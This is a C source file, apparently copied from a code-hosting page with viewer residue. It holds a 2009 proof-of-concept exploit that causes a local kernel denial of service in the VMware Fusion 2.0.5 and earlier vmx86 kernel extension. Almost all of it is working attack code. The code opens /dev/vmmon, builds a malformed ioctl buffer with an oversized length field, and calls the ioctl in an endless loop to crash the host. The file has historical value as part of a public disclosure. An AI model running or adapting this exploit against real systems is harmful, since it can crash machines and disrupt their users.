72 lines
No EOL
1.6 KiB
C
72 lines
No EOL
1.6 KiB
C
/* vmware-pop.c
|
|
*
|
|
* Copyright (c) 2009 by <mu-b@digit-labs.org>
|
|
*
|
|
* VMware Fusion <= 2.0.5 vmx86 kext local denial of service POC
|
|
* by mu-b - Mon 22 June 2009
|
|
*
|
|
* - Tested on: VMware Fusion 2.0.4 (10.5.x)
|
|
* VMware Fusion 2.0.5 (10.5.x)
|
|
*
|
|
* http://seclists.org/fulldisclosure/2009/Oct/29
|
|
* http://lists.vmware.com/pipermail/security-announce/2009/000066.html
|
|
*
|
|
* - this exploit is provided for educational purposes _only_. You are free
|
|
* to use this code in any way you wish provided you do not work for, or
|
|
* are associated in any way with Portcullis Computer Security Ltd.
|
|
*
|
|
* - Private Source Code -DO NOT DISTRIBUTE -
|
|
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
#include <fcntl.h>
|
|
#include <string.h>
|
|
#include <sys/ioctl.h>
|
|
#include <unistd.h>
|
|
|
|
#define VMX86_IOCTL 0x80045643
|
|
|
|
struct ioctl_req {
|
|
struct ioctl_req_buf *uaddr;
|
|
};
|
|
|
|
struct ioctl_req_buf {
|
|
char pad[0x8];
|
|
int len;
|
|
char _pad[0xC];
|
|
};
|
|
|
|
int
|
|
main (int argc, char **argv)
|
|
{
|
|
struct ioctl_req req;
|
|
struct ioctl_req_buf buf;
|
|
int fd, r;
|
|
|
|
printf ("VMware Fusion <= 2.0.5 vmx86 kext local kernel denial of service PoC\n"
|
|
"by: <mu-b@digit-labs.org>\n"
|
|
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
|
|
|
|
fd = open ("/dev/vmmon", O_RDONLY);
|
|
if (fd < 0)
|
|
{
|
|
fprintf (stderr, "%s: open failed\n", argv[0]);
|
|
exit (EXIT_FAILURE);
|
|
}
|
|
|
|
memset (&req, 0, sizeof req);
|
|
req.uaddr = &buf;
|
|
|
|
memset (&buf, 0x41, sizeof buf);
|
|
buf.len = 0xAAAAAAA;
|
|
|
|
printf ("* hitting...\n");
|
|
while (1)
|
|
r = ioctl (fd, VMX86_IOCTL, &req);
|
|
|
|
/* not reachable!$%! */
|
|
return (EXIT_SUCCESS);
|
|
} |